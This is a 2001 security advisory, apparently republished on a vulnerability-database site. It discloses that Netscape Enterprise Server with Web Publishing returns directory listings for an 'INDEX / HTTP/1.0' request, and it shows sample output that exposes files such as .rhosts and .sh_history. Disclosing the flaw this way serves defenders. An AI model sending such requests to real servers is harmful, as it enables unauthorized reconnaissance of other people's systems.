Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:1207
HistoryJan 25, 2001 - 12:00 a.m.

[SAFER] Security Bulletin 010124.EXP.1.11

2001-01-2500:00:00
vulners.com
19
JSON
  S.A.F.E.R. Security Bulletin 010124.EXP.1.11

TITLE : Netscape Enterprise Server - INDEX request problem
DATE : January 24, 2001
NATURE : Information gathering
AFFECTED : Netscape Enterprise Server 3.x and 4.x with Web Publishing enabled

PROBLEM:

Problems exists that allows remote user to obtain directory listings on remote
site running Web Publishing.

DETAILS:

It is possible to obtain directory listing on the remote web server by issuing
command:

INDEX / HTTP/1.0

Output looks like:

– output start –

Trying 192.168.1.1…
Connected to www.example.org.
Escape character is '^]'.
INDEX / HTTP/1.0

HTTP/1.1 200 OK
Server: Netscape-Enterprise/3.6 SP2
Date: Fri, 19 Jan 2001 12:37:26 GMT
Content-type: text/plain

test directory 512 979859452 0 null null
contact directory 512 979701766 0 null null
index.html text/html 1467 979701461 268 null null
mobile directory 512 979701775 0 null null
service directory 512 979701801 0 null null
.rhosts unknown 22 965727716 264 null null
search directory 512 931316908 0 null null
.sh_history unknown 1256 979723453 264 null null
corporate directory 512 972989267 0 null null
.cshrc unknown 418 975657629 264 null null
.login unknown 674 975657629 264 null null
.profile unknown 416 975657629 264 null null

– output end –

INDEX request will not work on 'aliased' directories (like CGI directories and
similar).

FIXES:

Netscape has been contacted on multiple occasions. First time, more than a
year ago. Although other problems we have reported have been fixed, we
have received no response for this issue - to date.

Workaround is to disable Web Publishing, or disable INDEX request (which will,
most likely, break web publishing feature).

CREDITS:

Emmanuel Gadaix <[email protected]>
Vanja Hrustic <[email protected]>
Fyodor Yarochkin <[email protected]>

This advisory is also available at http://www.safermag.com/advisories/

S.A.F.E.R. - Security Alert For Enterprise Resources
Copyright (c) 2001 The Relay Group
http://www.safermag.com ---- [email protected]

JSON